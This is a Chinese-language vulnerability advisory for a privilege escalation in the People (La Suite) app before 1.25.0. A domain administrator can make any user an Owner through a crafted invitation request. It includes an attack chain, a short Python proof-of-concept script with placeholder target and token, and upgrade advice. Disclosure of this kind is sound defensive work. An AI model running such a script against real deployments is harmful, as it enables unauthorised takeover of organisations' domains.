CVE-2026-42185 People权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-42185

漏洞类型

权限提升

CVSS评分

5.5 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

People (La Suite)

漏洞概述

People应用在1.25.0之前的版本中存在权限提升漏洞。拥有邮件域管理员角色的用户可以通过发送特制的邀请请求，将任何现有用户提升为所有者角色。该漏洞利用无需目标用户交互，立即授予完全域所有权。

技术细节

该漏洞源于People应用在处理用户邀请请求时的权限验证逻辑缺陷。系统未对特定角色的赋予操作进行严格的边界检查。攻击者只需拥有邮件域的“Administrator”权限，即可构造恶意的HTTP POST请求。在请求体中指定目标用户并将角色设置为“Owner”。由于缺乏越权校验，服务器直接处理该请求，导致目标用户获得最高权限。此过程仅需一次已认证请求，且绕过了目标用户的确认步骤。

攻击链分析

STEP 1

1. 获取初始访问权限

攻击者获取一个邮件域的Administrator角色账户凭证。

STEP 2

2. 发送恶意请求

攻击者利用该凭证发送特制的HTTP邀请请求，将目标用户角色设置为Owner。

STEP 3

3. 权限提升

服务器处理请求，目标用户立即获得域完全控制权，无需接受邀请。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Exploit for CVE-2026-42185: Privilege Escalation in People
# Note: Requires authentication as a Domain Administrator.

target_url = "https://<target-domain>/api/invitations"
headers = {
    "Authorization": "Bearer <ADMIN_TOKEN>",
    "Content-Type": "application/json"
}

# Malicious payload to promote user to Owner
payload = {
    "user_id": "<target_user_id>",
    "role": "Owner",
    "domain_id": "<domain_id>"
}

response = requests.post(target_url, json=payload, headers=headers)

if response.status_code == 200:
    print("[+] Success: User privileges escalated to Owner.")
else:
    print(f"[-] Failed: {response.status_code}")

影响范围

People < 1.25.0

防御指南

临时缓解措施

建议立即将People应用升级至1.25.0或更高版本。在升级前，应严格审查域管理员权限，并检查系统日志以确认是否已被利用。